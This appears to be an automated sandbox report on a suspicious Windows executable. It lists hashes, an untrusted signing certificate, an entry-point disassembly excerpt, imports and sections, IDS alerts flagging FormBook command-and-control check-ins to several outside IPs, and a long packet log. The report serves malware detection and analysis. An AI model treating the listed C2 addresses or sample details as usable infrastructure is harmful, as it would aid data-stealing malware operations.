                                                                                                                                                    SHA512:be1f8b04c0ff14dfb85089a1311f6fcffaa26db076d6889f756a077503430d7d7ff2cdfc944ed7ef1a47a7f88ad374834c8b945fb96ab1a82f09573c98a54d83
                                                                                                                                                    SSDEEP:6144:wIw3/aiZzcfWAnp3NRmqRAV596VJk4PGJ5zkk2vZBKmXSSwrw:Ma/1MVzim5zF2hwymw
                                                                                                                                                    TLSH:F0C4DF9B6ED2C9EED4530A3099E5B5B0B1F1ADF09B03990767B33AFD2C31E618E05215
                                                                                                                                                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L.....uY.................d...*.....
                                                                                                                                                    Icon Hash:5ce633391c1c0601
                                                                                                                                                    Entrypoint:0x403489
                                                                                                                                                    Entrypoint Section:.text
                                                                                                                                                    Digitally signed:true
                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                    Subsystem:windows gui
                                                                                                                                                    Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                    Time Stamp:0x5975952E [Mon Jul 24 06:35:26 2017 UTC]
                                                                                                                                                    TLS Callbacks:
                                                                                                                                                    CLR (.Net) Version:
                                                                                                                                                    OS Version Major:4
                                                                                                                                                    OS Version Minor:0
                                                                                                                                                    File Version Major:4
                                                                                                                                                    File Version Minor:0
                                                                                                                                                    Subsystem Version Major:4
                                                                                                                                                    Subsystem Version Minor:0
                                                                                                                                                    Import Hash:1f23f452093b5c1ff091a2f9fb4fa3e9
                                                                                                                                                    Signature Valid:false
                                                                                                                                                    Signature Issuer:CN="Adusk Mellemhandler ", E=meteoritics@Vacuolate.Je, L=Sanford, S=Michigan, C=US
                                                                                                                                                    Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                                                                                                                    Error Number:-2146762487
                                                                                                                                                    Not Before, Not After
                                                                                                                                                    • 05/09/2024 11:36:49 05/09/2027 11:36:49
                                                                                                                                                    Subject Chain
                                                                                                                                                    • CN="Adusk Mellemhandler ", E=meteoritics@Vacuolate.Je, L=Sanford, S=Michigan, C=US
                                                                                                                                                    Version:3
                                                                                                                                                    Thumbprint MD5:B289B9B21F52A17FDC61A0D70D86F1B8
                                                                                                                                                    Thumbprint SHA-1:DBE4A4D453126B6BF0C2598625BB04CE9CD1C5D5
                                                                                                                                                    Thumbprint SHA-256:344BFA8915E4912A82E48C85E479AF071690941A2C0E3DAAF3804C3454FDEBBC
                                                                                                                                                    Serial:247A1D845B68D30CAE805BFEE406FB9766A77266
                                                                                                                                                    Instruction
                                                                                                                                                    sub esp, 000002D4h
                                                                                                                                                    push ebx
                                                                                                                                                    push esi
                                                                                                                                                    push edi
                                                                                                                                                    push 00000020h
                                                                                                                                                    pop edi
                                                                                                                                                    xor ebx, ebx
                                                                                                                                                    push 00008001h
                                                                                                                                                    mov dword ptr [esp+14h], ebx
                                                                                                                                                    mov dword ptr [esp+10h], 0040A230h
                                                                                                                                                    mov dword ptr [esp+1Ch], ebx
                                                                                                                                                    call dword ptr [004080ACh]
                                                                                                                                                    call dword ptr [004080A8h]
                                                                                                                                                    and eax, BFFFFFFFh
                                                                                                                                                    cmp ax, 00000006h
                                                                                                                                                    mov dword ptr [0042A24Ch], eax
                                                                                                                                                    je 00007F5758AF7A63h
                                                                                                                                                    push ebx
                                                                                                                                                    call 00007F5758AFAD11h
                                                                                                                                                    cmp eax, ebx
                                                                                                                                                    je 00007F5758AF7A59h
                                                                                                                                                    push 00000C00h
                                                                                                                                                    call eax
                                                                                                                                                    mov esi, 004082B0h
                                                                                                                                                    push esi
                                                                                                                                                    call 00007F5758AFAC8Bh
                                                                                                                                                    push esi
                                                                                                                                                    call dword ptr [00408150h]
                                                                                                                                                    lea esi, dword ptr [esi+eax+01h]
                                                                                                                                                    cmp byte ptr [esi], 00000000h
                                                                                                                                                    jne 00007F5758AF7A3Ch
                                                                                                                                                    push 0000000Ah
                                                                                                                                                    call 00007F5758AFACE4h
                                                                                                                                                    push 00000008h
                                                                                                                                                    call 00007F5758AFACDDh
                                                                                                                                                    push 00000006h
                                                                                                                                                    mov dword ptr [0042A244h], eax
                                                                                                                                                    call 00007F5758AFACD1h
                                                                                                                                                    cmp eax, ebx
                                                                                                                                                    je 00007F5758AF7A61h
                                                                                                                                                    push 0000001Eh
                                                                                                                                                    call eax
                                                                                                                                                    test eax, eax
                                                                                                                                                    je 00007F5758AF7A59h
                                                                                                                                                    or byte ptr [0042A24Fh], 00000040h
                                                                                                                                                    push ebp
                                                                                                                                                    call dword ptr [00408044h]
                                                                                                                                                    push ebx
                                                                                                                                                    call dword ptr [004082A0h]
                                                                                                                                                    mov dword ptr [0042A318h], eax
                                                                                                                                                    push ebx
                                                                                                                                                    lea eax, dword ptr [esp+34h]
                                                                                                                                                    push 000002B4h
                                                                                                                                                    push eax
                                                                                                                                                    push ebx
                                                                                                                                                    push 004216E8h
                                                                                                                                                    call dword ptr [00408188h]
                                                                                                                                                    push 0040A384h
                                                                                                                                                    Programming Language:
                                                                                                                                                    • [EXP] VC++ 6.0 SP5 build 8804
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x84fc | 0xa0 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x57000 | 0x220b8 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x8cea8 | 0x1320 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x2b0 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x63d1 | 0x6400 | 139645791b76bd6f7b8c4472edbbdfe5 | False | 0.66515625 | data | 6.479451209065 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x8000 | 0x138e | 0x1400 | 007eff248f0493620a3fd3f7cadc755b | False | 0.45 | data | 5.143831732151552 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0xa000 | 0x20358 | 0x600 | ec5bcec782f43a3fb7e8dfbe0d0db4db | False | 0.501953125 | data | 4.000739070159718 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata | 0x2b000 | 0x2c000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x57000 | 0x220b8 | 0x22200 | 30cc4d5ad2d805f600d8d9358a38829a | False | 0.1827066163003663 | data | 2.9689436080399076 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x572c8 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 65536 | English | United States | 0.14975452502070272
RT_ICON | 0x67af0 | 0x94a8 | Device independent bitmap graphic, 96 x 192 x 32, image size 36864 | English | United States | 0.18344019339920117
RT_ICON | 0x70f98 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16384 | English | United States | 0.21953235710911667
RT_ICON | 0x751c0 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216 | English | United States | 0.2731327800829875
RT_ICON | 0x77768 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096 | English | United States | 0.3428705440900563
RT_DIALOG | 0x78810 | 0x120 | data | English | United States | 0.5138888888888888
RT_DIALOG | 0x78930 | 0x11c | data | English | United States | 0.6056338028169014
RT_DIALOG | 0x78a50 | 0xc4 | data | English | United States | 0.5918367346938775
RT_DIALOG | 0x78b18 | 0x60 | data | English | United States | 0.7291666666666666
RT_GROUP_ICON | 0x78b78 | 0x4c | data | English | United States | 0.8026315789473685
RT_VERSION | 0x78bc8 | 0x1b0 | data | English | United States | 0.5601851851851852
RT_MANIFEST | 0x78d78 | 0x33e | XML 1.0 document, ASCII text, with very long lines (830), with no line terminators | English | United States | 0.5542168674698795
DLL | Import
KERNEL32.dll | ExitProcess, SetFileAttributesW, Sleep, GetTickCount, CreateFileW, GetFileSize, GetModuleFileNameW, GetCurrentProcess, SetCurrentDirectoryW, GetFileAttributesW, SetEnvironmentVariableW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, CopyFileW, GetShortPathNameW, GlobalLock, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, GetTempFileNameW, WriteFile, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, lstrcmpiW, MoveFileW, GetFullPathNameW, SetFileTime, SearchPathW, CompareFileTime, lstrcmpW, CloseHandle, ExpandEnvironmentStringsW, GlobalFree, GlobalUnlock, GetDiskFreeSpaceW, GlobalAlloc, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, lstrlenA, MulDiv, MultiByteToWideChar, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
USER32.dll | GetSystemMenu, SetClassLongW, EnableMenuItem, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, ScreenToClient, GetWindowRect, GetDlgItem, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, GetDC, SetTimer, SetWindowTextW, LoadImageW, SetForegroundWindow, ShowWindow, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, CreateDialogParamW, SendMessageTimeoutW, wsprintfW, PostQuitMessage
GDI32.dll | SelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll | SHGetSpecialFolderLocation, ShellExecuteExW, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW
ADVAPI32.dll | AdjustTokenPrivileges, RegCreateKeyExW, RegOpenKeyExW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, RegEnumValueW, RegDeleteKeyW, RegDeleteValueW, RegCloseKey, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
COMCTL32.dll | ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll | OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
Language of compilation system | Country where language is spoken | Map
English | United States
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                                                                                                                                    2024-10-04T12:04:50.872277+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049828184.73.212.5180TCP
                                                                                                                                                    2024-10-04T12:04:57.558078+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049829199.192.19.1980TCP
                                                                                                                                                    2024-10-04T12:05:02.965053+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.204983013.248.169.4880TCP
                                                                                                                                                    2024-10-04T12:05:08.587904+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.204983143.252.167.18880TCP
                                                                                                                                                    2024-10-04T12:05:14.458837+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.204983231.217.192.15880TCP
                                                                                                                                                    2024-10-04T12:05:20.342733+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049833191.101.104.16480TCP
                                                                                                                                                    2024-10-04T12:05:25.578613+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.2049834162.255.119.15080TCP
                                                                                                                                                    2024-10-04T12:05:41.309214+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.11.204983591.195.240.1980TCP
Timestamp    Source Port    Dest Port    Source IP    Dest IP
                                                                                                                                                    Oct 4, 2024 11:57:20.700324059 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.700638056 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.704613924 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.704826117 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.704885960 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.705131054 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.708995104 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.709223986 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.709299088 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.709543943 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.713639021 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.713924885 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.713993073 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.714251995 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.718270063 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.718549967 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.720626116 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.720906019 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.720976114 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.721237898 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.725174904 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.725425005 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.725493908 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.725744009 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.729871988 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.730114937 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.730185032 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.730487108 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.734559059 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.734808922 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.734880924 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.735141993 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.738919973 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.739211082 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.739279032 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.739552975 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.743604898 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.743851900 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.743922949 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.744137049 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.747986078 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.748261929 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.748339891 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.748625040 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.752602100 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.752861977 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.752932072 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.753204107 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.756603956 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.756799936 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.756884098 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.757111073 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.760890961 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.761065960 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.761451960 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.762157917 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.765948057 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.767108917 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.767481089 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.768719912 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.769710064 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.770843983 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.770859957 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.771893978 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.771908998 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.772063971 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.773175001 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.773360968 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.773376942 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.773557901 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.775768042 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.775974035 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.775990009 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.776182890 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.778404951 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.778593063 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.778609037 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.778774977 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.781182051 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.781433105 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.781447887 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.781646013 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.783601999 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.783888102 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.783902884 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.784140110 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.786361933 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.786684036 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.786716938 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.787045002 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.788979053 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.789311886 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.789345026 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.789555073 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.791520119 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.791806936 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.791831017 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.792126894 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.793977022 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.794326067 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.794361115 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.794708014 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.796433926 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.796758890 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.796797991 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.797117949 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.798903942 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.799231052 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.799269915 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.799577951 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.801229954 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.801525116 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.801549911 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.801836967 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.803622961 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.803858042 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.804639101 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.804891109 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.804913998 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.805166960 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.807090044 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.807315111 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.807343960 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.807568073 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.809518099 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.809734106 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.887921095 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.887986898 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.888156891 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.889275074 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.889570951 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.889631987 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.889909983 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.890778065 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.890991926 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.891062021 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.891274929 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.892158985 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.892340899 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.892417908 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.892616987 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.893405914 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.893659115 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.893696070 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.893925905 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.894880056 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.895051956 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.895088911 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.895277977 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.896228075 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.896394968 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.896434069 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.896646023 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.897613049 CEST44349731142.250.176.193192.168.11.20
                                                                                                                                                    Oct 4, 2024 11:57:20.897828102 CEST49731443192.168.11.20142.250.176.193
                                                                                                                                                    Oct 4, 2024 11:57:20.897866964 CEST44349731142.250.176.193192.168.11.20
